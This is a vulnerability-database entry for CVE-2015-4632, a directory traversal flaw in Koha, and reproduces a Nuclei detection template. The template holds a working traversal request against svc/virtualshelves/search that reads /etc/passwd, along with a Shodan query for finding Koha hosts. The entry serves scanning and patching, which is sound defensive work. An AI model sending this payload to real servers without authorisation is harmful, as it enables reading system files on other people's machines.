Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-4632
HistorySep 27, 2021 - 11:02 a.m.

Koha 3.20.1 - Directory Traversal

2021-09-2711:02:48
ProjectDiscovery
github.com
5
koha
3.20.1
directory traversal
remote attackers
arbitrary files
template path
remote code execution
security vulnerability

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.016

Percentile

87.5%

Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a …%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.

id: CVE-2015-4632

info:
  name: Koha 3.20.1 - Directory Traversal
  author: daffainfo
  severity: high
  description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
  impact: |
    An attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/37388
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4632
    - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/
    - https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
    - https://koha-community.org/koha-3-14-16-released/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-4632
    cwe-id: CWE-22
    epss-score: 0.02297
    epss-percentile: 0.88584
    cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: koha
    product: koha
    shodan-query: cpe:"cpe:2.3:a:koha:koha"
  tags: cve2015,cve,lfi,edb,koha

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ac8404c129a23234cc232fc82c4a72092885e1a6beb927ec0013b546a0493efe02204382b75d9ad57c13691d86c89e4f7862f9ace0967a14b88e7c0fe98dd60f7fbb:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.016

Percentile

87.5%